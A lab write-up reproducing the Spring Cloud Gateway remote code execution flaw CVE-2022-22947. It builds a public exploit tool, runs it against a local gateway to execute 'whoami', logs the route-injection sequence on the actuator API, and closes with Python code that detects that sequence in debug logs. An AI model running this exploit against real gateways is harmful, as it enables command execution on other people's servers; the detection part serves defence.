CVE-2022-22947 is a remote code execution vulnerability in the open-source project Spring Cloud Gateway.
Affected versions:
Test environment:
java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar --debug
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.3-SNAPSHOT)
Netty started on port 9000
$ curl http://localhost:9000/actuator
{"_links":{"self":{"href":"http://localhost:9000/actuator","templated":false},"gateway":{"href":"http://localhost:9000/actuator/gateway","templated":false}}}
Original repository
$ git remote -v
origin https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (fetch)
origin https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (push)
$ go build main.go
go: downloading github.com/panjf2000/ants/v2 v2.4.8
go: downloading github.com/go-resty/resty/v2 v2.7.0
go: downloading golang.org/x/net v0.0.0-20211029224645-99673261e6eb
$ ./main -u http://127.0.0.1:9000 -c whoami
http://127.0.0.1:9000 'bin4xin\n'
Traffic detection: analyze HTTP traffic and check for requests that access the actuator gateway API abnormally.
2022-03-15 10:22:26.711 DEBUG 11029 --- [ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter : [68b629bb-1] HTTP POST "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-2] a.e.w.r.ControllerEndpointHandlerMapping : [68b629bb-1] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#save(String, RouteDefinition)
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] Content-Type:application/json
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] 0..1 [org.springframework.cloud.gateway.route.RouteDefinition]
[ctor-http-nio-2] o.s.http.codec.json.Jackson2JsonDecoder : [68b629bb-1] Decoded [RouteDefinition{id='LZQXX', predicates=[], filters=[FilterDefinition{name='AddResponseHeader', args= (truncated)...]
[ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter : [68b629bb-1] Completed 201 CREATED
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter : [36032421-2] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-3] a.e.w.r.ControllerEndpointHandlerMapping : [36032421-2] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter : [36032421-2] Completed 200 OK
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter : [9763438e-3] HTTP GET "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-4] a.e.w.r.ControllerEndpointHandlerMapping : [9763438e-3] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#route(String)
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] Using 'application/json' given [*/*] and supported [application/json, application/*+json, application/x-ndjson, text/event-stream]
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] 0..1 [java.util.Map<java.lang.String, java.lang.Object>]
[ctor-http-nio-4] o.s.http.codec.json.Jackson2JsonEncoder : [9763438e-3] Encoding [{predicate=RouteDefinitionRouteLocator$$Lambda$918/2002125647, route_id=LZQXX, filters=[[[AddRespons (truncated)...]
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter : [9763438e-3] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-4] HTTP DELETE "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-4] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#delete(String)
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-4] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-5] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-5] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-5] Completed 200 OK
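
The detection idea above, applied to the debug log format shown, as an added example (not code from the original post or the referenced repository). It groups requests to the actuator gateway API by route id and rates each route that was written to; the rating names, the sample log and the route id "demo-route" are constructed for illustration.

```python
import re
from collections import defaultdict

# Request line written by HttpWebHandlerAdapter at DEBUG level.
REQ = re.compile(r'\[[0-9a-f]+-\d+\] HTTP ([A-Z]+) "([^"]+)"')
ROUTE = re.compile(r"^/actuator/gateway/routes/([^/?]+)")
REFRESH = "/actuator/gateway/refresh"

# Constructed sample in the format of the log above; "demo-route" and the
# first two GET lines are invented to represent benign, read-only activity.
SAMPLE_LOG = """\
[ctor-http-nio-1] o.s.w.s.adapter.HttpWebHandlerAdapter : [0a1b2c3d-1] HTTP GET "/actuator/gateway/routes"
[ctor-http-nio-1] o.s.w.s.adapter.HttpWebHandlerAdapter : [0a1b2c3d-2] HTTP GET "/actuator/gateway/routes/demo-route"
[ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter : [68b629bb-1] HTTP POST "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter : [36032421-2] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter : [9763438e-3] HTTP GET "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-4] HTTP DELETE "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-5] HTTP POST "/actuator/gateway/refresh"
"""

def route_events(log_text):
    """Return {route_id: [event, ...]}; a refresh is added to every route seen so far."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = REQ.search(line)
        if not m:
            continue
        method, path = m.groups()
        if method == "POST" and path.split("?")[0] == REFRESH:
            for seen in events.values():
                seen.append("REFRESH")
        elif (r := ROUTE.match(path)):
            events[r.group(1)].append(method)
    return dict(events)

def classify(events):
    """Rate one route's events; create -> refresh -> delete is the pattern in the log."""
    if "POST" not in events:
        return "route-deleted" if "DELETE" in events else "read-only"
    after = events[events.index("POST") + 1:]
    if "REFRESH" not in after:
        return "route-created"
    after = after[after.index("REFRESH") + 1:]
    return "create-refresh-delete" if "DELETE" in after else "route-activated"

def detect(log_text):
    """Return {route_id: rating} for every route that was written to."""
    rated = {rid: classify(ev) for rid, ev in route_events(log_text).items()}
    return {rid: r for rid, r in rated.items() if r != "read-only"}
```

Calling detect(SAMPLE_LOG) reports only LZQXX; any write to the route API is rated, so the same function can feed an alert on route creation alone.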
That is all.